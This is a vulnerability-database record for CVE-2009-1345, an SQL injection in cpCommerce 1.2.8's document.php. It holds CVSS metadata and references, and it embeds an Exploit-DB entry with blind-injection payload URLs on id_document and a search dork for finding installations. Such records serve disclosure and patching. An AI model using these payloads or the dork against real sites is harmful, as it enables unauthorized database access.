ID CVE-2009-1345
Type cve
Reporter cve@mitre.org
Modified 2017-09-29T01:34:00
Description
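SQL injection vulnerability in document.php in cpCommerce 1.2.8 allows remote attackers to execute arbitrary SQL commands via the id_document parameter. The record below classifies this as CWE-89 with a CVSS v2 base score of 7.5 (AV:N/AC:L/Au:N, i.e. reachable over the network without authentication), lists only version 1.2.8 as affected, names no fixed version, and references a public exploit entry (EDB-ID:8455); installations of that version should therefore be treated as exposed until id_document is handled through a parameterized query or strict input validation.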
{"id": "CVE-2009-1345", "bulletinFamily": "NVD", "title": "CVE-2009-1345", "description": "SQL injection vulnerability in document.php in cpCommerce 1.2.8 allows remote attackers to execute arbitrary SQL commands via the id_document parameter.", "published": "2009-04-20T14:30:00", "modified": "2017-09-29T01:34:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1345", "reporter": "cve@mitre.org", "references": ["https://www.exploit-db.com/exploits/8455", "http://www.securitytracker.com/id?1022082", "https://exchange.xforce.ibmcloud.com/vulnerabilities/49901", "http://www.securityfocus.com/bid/34556"], "cvelist": ["CVE-2009-1345"], "type": "cve", "lastseen": "2021-02-02T05:40:01", "edition": 4, "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:8455"]}], "modified": "2021-02-02T05:40:01", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-02-02T05:40:01", "rev": 2}, "vulnersScore": 7.7}, "cpe": ["cpe:/a:cpcommerce:cpcommerce:1.2.8"], "affectedSoftware": [{"cpeName": "cpcommerce:cpcommerce", "name": "cpcommerce", "operator": "eq", "version": "1.2.8"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": true, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:cpcommerce:cpcommerce:1.2.8:*:*:*:*:*:*:*"], "cwe": ["CWE-89"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:cpcommerce:cpcommerce:1.2.8:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, 
"extraReferences": [{"name": "cpcommerce-document-sql-injection(49901)", "refsource": "XF", "tags": [], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/49901"}, {"name": "1022082", "refsource": "SECTRACK", "tags": [], "url": "http://www.securitytracker.com/id?1022082"}, {"name": "34556", "refsource": "BID", "tags": ["Exploit"], "url": "http://www.securityfocus.com/bid/34556"}, {"name": "8455", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/8455"}]}
{"exploitdb": [{"lastseen": "2016-02-01T05:34:45", "description": "cpCommerce 1.2.8 (id_document) Blind SQL Injection Vulnerability. CVE-2009-1345. Webapps exploit for php platform", "published": "2009-04-16T00:00:00", "type": "exploitdb", "title": "cpCommerce 1.2.8 id_document Blind SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1345"], "modified": "2009-04-16T00:00:00", "id": "EDB-ID:8455", "href": "https://www.exploit-db.com/exploits/8455/", "sourceData": "==========================================================================================\n\n\n [o] cpCommerce 1.2.8 Blind SQL Injection Vulnerability\n\n Software : cpCommerce version 1.2.8\n Vendor : http://cpcommerce.cpradio.org/\n Download : http://cpcommerce.cpradio.org/downloads.php\n Author : NoGe\n Contact : noge[dot]code[at]gmail[dot]com\n Blog : http://evilc0de.blogspot.com\n\n\n==========================================================================================\n\n\n [o] Vulnerable file\n\n document.php\n\n\n\n [o] Exploit\n\n http://localhost/[path]/document.php?id_document=[SQL]\n http://localhost/[path]/document.php?id_document=1 and substring(@@version,1,1)=4\n http://localhost/[path]/document.php?id_document=1 and substring(@@version,1,1)=5\n\n\n\n [o] Dork\n\n \"Powered by cpcommerce\"\n\n\n==========================================================================================\n\n\n [o] Greetz\n\n MainHack BrotherHood [ http://serverisdown.org ]\n OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang\n H312Y yooogy mousekill }^-^{ loqsa zxvf\n skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke\n Special for Vrs-hCk [ thx cuy.. :p ]\n\n \n==========================================================================================\n\n# milw0rm.com [2009-04-16]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/8455/"}]}